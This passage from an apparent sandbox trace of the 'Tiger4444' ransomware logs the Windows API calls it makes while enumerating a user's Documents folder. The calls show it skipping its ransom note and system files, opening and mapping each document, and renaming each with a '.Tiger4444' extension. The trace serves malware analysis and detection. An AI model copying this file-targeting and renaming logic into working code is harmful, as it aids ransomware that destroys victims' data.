(lpString="iAgvW_.odp") returned 10 [0047.263] lstrlenW (lpString="Tiger4444") returned 9 [0047.263] lstrcmpiW (lpString1="AgvW_.odp", lpString2="Tiger4444") returned -1 [0047.263] lstrlenW (lpString=".dll") returned 4 [0047.263] lstrcmpiW (lpString1=".odp", lpString2=".dll") returned 1 [0047.263] lstrlenW (lpString=".lnk") returned 4 [0047.263] lstrcmpiW (lpString1=".odp", lpString2=".lnk") returned 1 [0047.263] lstrlenW (lpString=".ini") returned 4 [0047.263] lstrcmpiW (lpString1=".odp", lpString2=".ini") returned 1 [0047.263] lstrlenW (lpString=".sys") returned 4 [0047.263] lstrcmpiW (lpString1=".odp", lpString2=".sys") returned -1 [0047.263] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\iAgvW_.odp" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\iagvw_.odp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.263] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.263] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13871649757) returned 1 [0047.263] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=66093) returned 1 [0047.263] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89608 [0047.264] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0047.264] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10530, lpName=0x0) returned 0x2c8 [0047.264] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10530) returned 0xbe0000 [0047.265] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.265] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0047.265] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.265] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0047.265] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.265] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0047.265] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.265] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0047.265] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13871853091) returned 1 [0047.265] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89608 | out: hHeap=0xc50000) returned 1 [0047.265] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0047.266] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.266] CloseHandle (hObject=0x2c8) returned 1 [0047.266] CloseHandle (hObject=0x260) returned 1 [0047.269] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\iAgvW_.odp.Tiger4444") returned 71 [0047.269] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\iAgvW_.odp" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\iagvw_.odp"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\iAgvW_.odp.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\iagvw_.odp.tiger4444"), dwFlags=0x1) returned 1 [0047.270] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=66096 | out: Addend=0xc6f980) returned 22855648 [0047.270] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4871 [0047.270] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc74026a0, ftCreationTime.dwHighDateTime=0x1d4d4e0, ftLastAccessTime.dwLowDateTime=0x59a11f0, ftLastAccessTime.dwHighDateTime=0x1d4d373, ftLastWriteTime.dwLowDateTime=0x59a11f0, ftLastWriteTime.dwHighDateTime=0x1d4d373, nFileSizeHigh=0x0, nFileSizeLow=0x17165, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JBjCvXV vQ.ppt", cAlternateFileName="JBJCVX~1.PPT")) returned 1 [0047.270] lstrcmpiW (lpString1="JBjCvXV vQ.ppt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.270] lstrcmpiW (lpString1="JBjCvXV vQ.ppt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.270] lstrcmpiW (lpString1="JBjCvXV vQ.ppt", lpString2="Tiger4444.exe") returned -1 [0047.270] lstrcmpiW (lpString1="JBjCvXV vQ.ppt", lpString2=".") returned 1 [0047.270] lstrcmpiW (lpString1="JBjCvXV vQ.ppt", lpString2="..") returned 1 [0047.270] lstrcmpiW (lpString1="JBjCvXV vQ.ppt", lpString2="windows") returned -1 [0047.270] lstrcmpiW (lpString1="JBjCvXV vQ.ppt", lpString2="bootmgr") returned 1 [0047.270] lstrcmpiW (lpString1="JBjCvXV vQ.ppt", lpString2="pagefile.sys") returned -1 [0047.270] lstrcmpiW (lpString1="JBjCvXV vQ.ppt", lpString2="boot") returned 1 [0047.270] lstrcmpiW (lpString1="JBjCvXV vQ.ppt", lpString2="ids.txt") returned 1 [0047.270] lstrcmpiW (lpString1="JBjCvXV vQ.ppt", lpString2="NTUSER.DAT") returned -1 [0047.270] lstrcpyW (in: lpString1=0x30aeb0e, lpString2="JBjCvXV vQ.ppt" | out: lpString1="JBjCvXV vQ.ppt") returned="JBjCvXV vQ.ppt" [0047.270] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\JBjCvXV vQ.ppt", dwFileAttributes=0x0) returned 1 [0047.270] lstrlenW (lpString="JBjCvXV vQ.ppt") returned 14 [0047.270] lstrlenW (lpString="Tiger4444") returned 9 [0047.270] lstrcmpiW (lpString1="XV vQ.ppt", lpString2="Tiger4444") returned 1 [0047.270] lstrlenW (lpString=".dll") returned 4 [0047.270] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.270] lstrlenW (lpString=".lnk") returned 4 [0047.270] lstrcmpiW (lpString1=".ppt", lpString2=".lnk") returned 1 [0047.270] lstrlenW (lpString=".ini") returned 4 [0047.270] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0047.270] lstrlenW (lpString=".sys") returned 4 [0047.270] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0047.271] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\JBjCvXV vQ.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\jbjcvxv vq.ppt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.271] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.271] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13872384778) returned 1 [0047.271] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=94565) returned 1 [0047.271] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ba8 [0047.271] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71bf8 [0047.271] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17470, lpName=0x0) returned 0x2c8 [0047.271] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17470) returned 0xbe0000 [0047.273] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.273] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0047.273] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.273] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0047.273] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.273] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0047.273] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.273] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0047.273] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13872647239) returned 1 [0047.273] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ba8 | out: hHeap=0xc50000) returned 1 [0047.273] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71bf8 | out: hHeap=0xc50000) returned 1 [0047.273] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.274] CloseHandle (hObject=0x2c8) returned 1 [0047.274] CloseHandle (hObject=0x260) returned 1 [0047.275] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\JBjCvXV vQ.ppt.Tiger4444") returned 75 [0047.275] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\JBjCvXV vQ.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\jbjcvxv vq.ppt"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\JBjCvXV vQ.ppt.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\jbjcvxv vq.ppt.tiger4444"), dwFlags=0x1) returned 1 [0047.276] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=94576 | out: Addend=0xc6f980) returned 22921744 [0047.276] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4873 [0047.276] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f46b970, ftCreationTime.dwHighDateTime=0x1d4ce90, ftLastAccessTime.dwLowDateTime=0xa3aa6e40, ftLastAccessTime.dwHighDateTime=0x1d4cf17, ftLastWriteTime.dwLowDateTime=0xa3aa6e40, ftLastWriteTime.dwHighDateTime=0x1d4cf17, nFileSizeHigh=0x0, nFileSizeLow=0x13fdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RMDD_1hr.pdf", cAlternateFileName="")) returned 1 [0047.276] lstrcmpiW (lpString1="RMDD_1hr.pdf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.276] lstrcmpiW (lpString1="RMDD_1hr.pdf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.276] lstrcmpiW (lpString1="RMDD_1hr.pdf", lpString2="Tiger4444.exe") returned -1 [0047.276] lstrcmpiW (lpString1="RMDD_1hr.pdf", lpString2=".") returned 1 [0047.276] lstrcmpiW (lpString1="RMDD_1hr.pdf", lpString2="..") returned 1 [0047.276] lstrcmpiW (lpString1="RMDD_1hr.pdf", lpString2="windows") returned -1 [0047.276] lstrcmpiW (lpString1="RMDD_1hr.pdf", lpString2="bootmgr") returned 1 [0047.276] lstrcmpiW (lpString1="RMDD_1hr.pdf", lpString2="pagefile.sys") returned 1 [0047.276] lstrcmpiW (lpString1="RMDD_1hr.pdf", lpString2="boot") returned 1 [0047.276] lstrcmpiW (lpString1="RMDD_1hr.pdf", lpString2="ids.txt") returned 1 [0047.276] lstrcmpiW (lpString1="RMDD_1hr.pdf", lpString2="NTUSER.DAT") returned 1 [0047.276] lstrcpyW (in: lpString1=0x30aeb0e, lpString2="RMDD_1hr.pdf" | out: lpString1="RMDD_1hr.pdf") returned="RMDD_1hr.pdf" [0047.276] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\RMDD_1hr.pdf", dwFileAttributes=0x0) returned 1 [0047.276] lstrlenW (lpString="RMDD_1hr.pdf") returned 12 [0047.432] lstrlenW (lpString="Tiger4444") returned 9 [0047.432] lstrcmpiW (lpString1="D_1hr.pdf", lpString2="Tiger4444") returned -1 [0047.432] lstrlenW (lpString=".dll") returned 4 [0047.432] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.432] lstrlenW (lpString=".lnk") returned 4 [0047.432] lstrcmpiW (lpString1=".pdf", lpString2=".lnk") returned 1 [0047.432] lstrlenW (lpString=".ini") returned 4 [0047.432] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0047.432] lstrlenW (lpString=".sys") returned 4 [0047.432] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0047.432] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\RMDD_1hr.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\rmdd_1hr.pdf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.432] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.432] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13888516128) returned 1 [0047.432] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=81884) returned 1 [0047.432] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0047.432] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71730 [0047.432] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x142e0, lpName=0x0) returned 0x2c8 [0047.432] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x142e0) returned 0xbe0000 [0047.434] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.434] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0047.434] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.434] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0047.435] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.435] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0047.435] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.435] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0047.435] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13888797688) returned 1 [0047.435] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0047.435] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71730 | out: hHeap=0xc50000) returned 1 [0047.435] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.436] CloseHandle (hObject=0x2c8) returned 1 [0047.436] CloseHandle (hObject=0x260) returned 1 [0047.436] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\RMDD_1hr.pdf.Tiger4444") returned 73 [0047.436] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\RMDD_1hr.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\rmdd_1hr.pdf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\RMDD_1hr.pdf.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\rmdd_1hr.pdf.tiger4444"), dwFlags=0x1) returned 1 [0047.437] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=81888 | out: Addend=0xc6f980) returned 23016320 [0047.437] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4875 [0047.437] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda3dc4b0, ftCreationTime.dwHighDateTime=0x1d4cb8f, ftLastAccessTime.dwLowDateTime=0xdce8ec50, ftLastAccessTime.dwHighDateTime=0x1d4c8c2, ftLastWriteTime.dwLowDateTime=0xdce8ec50, ftLastWriteTime.dwHighDateTime=0x1d4c8c2, nFileSizeHigh=0x0, nFileSizeLow=0x4543, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VfPvOBGOXfF2YuC.pptx", cAlternateFileName="VFPVOB~1.PPT")) returned 1 [0047.437] lstrcmpiW (lpString1="VfPvOBGOXfF2YuC.pptx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.437] lstrcmpiW (lpString1="VfPvOBGOXfF2YuC.pptx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.437] lstrcmpiW (lpString1="VfPvOBGOXfF2YuC.pptx", lpString2="Tiger4444.exe") returned 1 [0047.437] lstrcmpiW (lpString1="VfPvOBGOXfF2YuC.pptx", lpString2=".") returned 1 [0047.437] lstrcmpiW (lpString1="VfPvOBGOXfF2YuC.pptx", lpString2="..") returned 1 [0047.437] lstrcmpiW (lpString1="VfPvOBGOXfF2YuC.pptx", lpString2="windows") returned -1 [0047.437] lstrcmpiW (lpString1="VfPvOBGOXfF2YuC.pptx", lpString2="bootmgr") returned 1 [0047.437] lstrcmpiW (lpString1="VfPvOBGOXfF2YuC.pptx", lpString2="pagefile.sys") returned 1 [0047.437] lstrcmpiW (lpString1="VfPvOBGOXfF2YuC.pptx", lpString2="boot") returned 1 [0047.437] lstrcmpiW (lpString1="VfPvOBGOXfF2YuC.pptx", lpString2="ids.txt") returned 1 [0047.437] lstrcmpiW (lpString1="VfPvOBGOXfF2YuC.pptx", lpString2="NTUSER.DAT") returned 1 [0047.437] lstrcpyW (in: lpString1=0x30aeb0e, lpString2="VfPvOBGOXfF2YuC.pptx" | out: lpString1="VfPvOBGOXfF2YuC.pptx") returned="VfPvOBGOXfF2YuC.pptx" [0047.437] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\VfPvOBGOXfF2YuC.pptx", dwFileAttributes=0x0) returned 1 [0047.437] lstrlenW (lpString="VfPvOBGOXfF2YuC.pptx") returned 20 [0047.437] lstrlenW (lpString="Tiger4444") returned 9 [0047.437] lstrcmpiW (lpString1="2YuC.pptx", lpString2="Tiger4444") returned -1 [0047.437] lstrlenW (lpString=".dll") returned 4 [0047.437] lstrcmpiW (lpString1="pptx", lpString2=".dll") returned 1 [0047.437] lstrlenW (lpString=".lnk") returned 4 [0047.437] lstrcmpiW (lpString1="pptx", lpString2=".lnk") returned 1 [0047.437] lstrlenW (lpString=".ini") returned 4 [0047.438] lstrcmpiW (lpString1="pptx", lpString2=".ini") returned 1 [0047.438] lstrlenW (lpString=".sys") returned 4 [0047.438] lstrcmpiW (lpString1="pptx", lpString2=".sys") returned 1 [0047.438] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\VfPvOBGOXfF2YuC.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\vfpvobgoxff2yuc.pptx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.438] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.438] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13889084584) returned 1 [0047.438] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=17731) returned 1 [0047.438] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0047.438] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0047.438] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4850, lpName=0x0) returned 0x2c8 [0047.438] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4850) returned 0xbe0000 [0047.439] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.439] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0047.439] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.439] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0047.439] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.439] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0047.439] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.439] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0047.439] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13889218889) returned 1 [0047.439] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0047.439] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0047.439] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.439] CloseHandle (hObject=0x2c8) returned 1 [0047.440] CloseHandle (hObject=0x260) returned 1 [0047.440] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\VfPvOBGOXfF2YuC.pptx.Tiger4444") returned 81 [0047.440] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\VfPvOBGOXfF2YuC.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\vfpvobgoxff2yuc.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\VfPvOBGOXfF2YuC.pptx.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\vfpvobgoxff2yuc.pptx.tiger4444"), dwFlags=0x1) returned 1 [0047.441] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=17744 | out: Addend=0xc6f980) returned 23098208 [0047.441] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4877 [0047.441] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf26b540, ftCreationTime.dwHighDateTime=0x1d4d262, ftLastAccessTime.dwLowDateTime=0xe36ef690, ftLastAccessTime.dwHighDateTime=0x1d4c94a, ftLastWriteTime.dwLowDateTime=0xe36ef690, ftLastWriteTime.dwHighDateTime=0x1d4c94a, nFileSizeHigh=0x0, nFileSizeLow=0x7b71, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yBFSczQSgZ4zH_5p0CuH.ots", cAlternateFileName="YBFSCZ~1.OTS")) returned 1 [0047.441] lstrcmpiW (lpString1="yBFSczQSgZ4zH_5p0CuH.ots", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.441] lstrcmpiW (lpString1="yBFSczQSgZ4zH_5p0CuH.ots", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.441] lstrcmpiW (lpString1="yBFSczQSgZ4zH_5p0CuH.ots", lpString2="Tiger4444.exe") returned 1 [0047.441] lstrcmpiW (lpString1="yBFSczQSgZ4zH_5p0CuH.ots", lpString2=".") returned 1 [0047.441] lstrcmpiW (lpString1="yBFSczQSgZ4zH_5p0CuH.ots", lpString2="..") returned 1 [0047.441] lstrcmpiW (lpString1="yBFSczQSgZ4zH_5p0CuH.ots", lpString2="windows") returned 1 [0047.441] lstrcmpiW (lpString1="yBFSczQSgZ4zH_5p0CuH.ots", lpString2="bootmgr") returned 1 [0047.441] lstrcmpiW (lpString1="yBFSczQSgZ4zH_5p0CuH.ots", lpString2="pagefile.sys") returned 1 [0047.441] lstrcmpiW (lpString1="yBFSczQSgZ4zH_5p0CuH.ots", lpString2="boot") returned 1 [0047.441] lstrcmpiW (lpString1="yBFSczQSgZ4zH_5p0CuH.ots", lpString2="ids.txt") returned 1 [0047.441] lstrcmpiW (lpString1="yBFSczQSgZ4zH_5p0CuH.ots", lpString2="NTUSER.DAT") returned 1 [0047.441] lstrcpyW (in: lpString1=0x30aeb0e, lpString2="yBFSczQSgZ4zH_5p0CuH.ots" | out: lpString1="yBFSczQSgZ4zH_5p0CuH.ots") returned="yBFSczQSgZ4zH_5p0CuH.ots" [0047.441] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\yBFSczQSgZ4zH_5p0CuH.ots", dwFileAttributes=0x0) returned 1 [0047.441] lstrlenW (lpString="yBFSczQSgZ4zH_5p0CuH.ots") returned 24 [0047.441] lstrlenW (lpString="Tiger4444") returned 9 [0047.441] lstrcmpiW (lpString1="p0CuH.ots", lpString2="Tiger4444") returned -1 [0047.441] lstrlenW (lpString=".dll") returned 4 [0047.441] lstrcmpiW (lpString1=".ots", lpString2=".dll") returned 1 [0047.441] lstrlenW (lpString=".lnk") returned 4 [0047.441] lstrcmpiW (lpString1=".ots", lpString2=".lnk") returned 1 [0047.441] lstrlenW (lpString=".ini") returned 4 [0047.441] lstrcmpiW (lpString1=".ots", lpString2=".ini") returned 1 [0047.441] lstrlenW (lpString=".sys") returned 4 [0047.441] lstrcmpiW (lpString1=".ots", lpString2=".sys") returned -1 [0047.441] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\yBFSczQSgZ4zH_5p0CuH.ots" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\ybfsczqsgz4zh_5p0cuh.ots"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.441] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 